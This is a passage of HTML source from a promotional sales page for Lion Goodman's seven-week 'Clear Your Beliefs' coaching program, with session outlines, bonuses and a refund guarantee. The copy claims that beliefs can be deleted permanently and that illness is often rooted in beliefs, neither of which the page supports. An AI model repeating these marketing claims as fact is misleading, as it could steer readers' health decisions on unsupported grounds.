for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching 